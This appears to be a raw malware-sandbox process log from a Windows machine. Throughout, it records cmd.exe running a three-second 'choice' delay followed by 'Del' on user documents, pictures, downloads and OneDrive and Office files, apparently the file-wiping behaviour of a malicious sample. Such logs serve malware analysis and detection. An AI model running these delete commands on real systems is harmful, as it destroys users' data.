-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\DisconnectSkip.pptx"3⤵PID:2344
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6640
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\RepairReceive.doc"3⤵PID:4388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7452
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\StopDebug.docx"3⤵PID:3876
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7556
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Are.docx"3⤵PID:2328
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8044
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Files.docx"3⤵PID:2020
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8560
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\GrantStep.csv"3⤵PID:1932
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6916
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Opened.docx"3⤵PID:4236
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7132
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\Recently.docx"3⤵PID:664
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8036
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\SearchDismount.pdf"3⤵PID:3652
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7144
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\These.docx"3⤵PID:5028
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7604
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\UninstallConnect.odt"3⤵PID:5080
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8392
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\DisableJoin.php"3⤵PID:424
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8380
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\NewRemove.docx"3⤵PID:2728
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6768
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Downloads\UndoBlock.sql"3⤵PID:4468
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8208
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Desktop.lnk"3⤵PID:3716
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8412
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Links\Downloads.lnk"3⤵PID:2808
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8400
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\ExportCopy.png"3⤵PID:5008
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6124
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\InvokeGrant.jpg"3⤵PID:1280
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8228
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\My Wallpaper.jpg"3⤵PID:3368
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6808
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\RemoveDisconnect.bmp"3⤵PID:1940
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8216
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\StepAdd.png"3⤵PID:4788
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5988
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\TestEdit.bmp"3⤵PID:536
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6788
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\UnprotectGet.jpg"3⤵PID:4244
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7160
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Pictures\UnpublishSearch.bmp"3⤵PID:448
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6816
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\CompareRemove.html"3⤵PID:244
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8200
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\RevokeConvertTo.html"3⤵PID:4100
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6940
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\SplitUnregister.pptx"3⤵PID:376
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8128
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1714135627.txt"3⤵PID:3720
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8472
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"3⤵PID:4956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8236
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI473A.txt"3⤵PID:4872
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6848
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI475A.txt"3⤵PID:2180
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6860
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI473A.txt"3⤵PID:4060
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6672
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI475A.txt"3⤵PID:5260
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\jawshtml.html"3⤵PID:5364
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:7476
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Microsoft .NET Framework 4.7.2 Setup_20240426_124230482.html"3⤵PID:5376
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12468
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt"3⤵PID:5388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8608
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.VisualElementsManifest.xml"3⤵PID:5400
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8776
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt"3⤵PID:5412
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12684
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\edge_shutdown_ms.txt"3⤵PID:5424
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6052
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml"3⤵PID:5436
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8480
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml"3⤵PID:5460
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8616
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\msoia.exe_Rules.xml"3⤵PID:5476
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12932
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\office2016setup.exe_Rules.xml"3⤵PID:5492
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8540
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml"3⤵PID:5548
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12668
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\onenote.exe_Rules.xml"3⤵PID:5732
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12460
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\winword.exe_Rules.xml"3⤵PID:5824
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14120
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\alertIcon.png"3⤵PID:5956
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13944
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppBlue.png"3⤵PID:5972
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13656
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorBlue.png"3⤵PID:5992
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13100
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppErrorWhite.png"3⤵PID:6012
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13284
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AppWhite.png"3⤵PID:6028
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13336
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\AutoPlayOptIn.png"3⤵PID:6040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13092
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppBlue.png"3⤵PID:6056
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ElevatedAppWhite.png"3⤵PID:6076
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13416
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Error.png"3⤵PID:6092
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13968
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ErrorPage.html"3⤵PID:6116
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:5256
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMHeroToast.png"3⤵PID:6128
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9080
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMLockedFileToast.png"3⤵PID:6140
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:9344
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\KFMScanExclusionToast.png"3⤵PID:5136
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13344
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\LoadingPage.html"3⤵PID:5384
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:10252
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\OneDriveLogo.png"3⤵PID:5248
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:6196
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaCritical.png"3⤵PID:5432
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14112
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaError.png"3⤵PID:5304
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:8768
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\QuotaNearing.png"3⤵PID:6200
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14128
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\TestSharePage.html"3⤵PID:6332
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13664
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ThirdPartyNotices.txt"3⤵PID:6356
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14056
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Warning.png"3⤵PID:6368
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:432
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-100.png"3⤵PID:6388
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13860
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-125.png"3⤵PID:6472
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14076
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-150.png"3⤵PID:6484
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13572
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-200.png"3⤵PID:6500
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13924
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-black_scale-400.png"3⤵PID:6512
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14036
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-100.png"3⤵PID:6524
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14192
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-125.png"3⤵PID:6544
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:3060
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-150.png"3⤵PID:6556
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13960
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-200.png"3⤵PID:6568
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13560
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.contrast-white_scale-400.png"3⤵PID:6580
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12972
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-100.png"3⤵PID:6760
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13952
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-125.png"3⤵PID:6780
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14264
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-150.png"3⤵PID:6800
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14360
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-200.png"3⤵PID:6952
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14344
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveMedTile.scale-400.png"3⤵PID:6976
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14720
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png"3⤵PID:6996
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14064
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png"3⤵PID:7020
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14352
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png"3⤵PID:7040
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4692
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png"3⤵PID:6408
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14588
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png"3⤵PID:6464
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14684
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png"3⤵PID:6948
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14708
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png"3⤵PID:6776
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14312
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png"3⤵PID:7192
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:4092
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png"3⤵PID:7212
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15048
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.contrast-white_scale-400.png"3⤵PID:7224
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:15068
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-100.png"3⤵PID:7244
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:2852
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-125.png"3⤵PID:7256
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14780
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-150.png"3⤵PID:7272
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14292
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-200.png"3⤵PID:7328
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14300
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\LogoImages\OneDriveSmallTile.scale-400.png"3⤵PID:7348
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:14700
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml"3⤵PID:7364
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:12824
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk"3⤵PID:7384
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 34⤵PID:13236
-
-
-
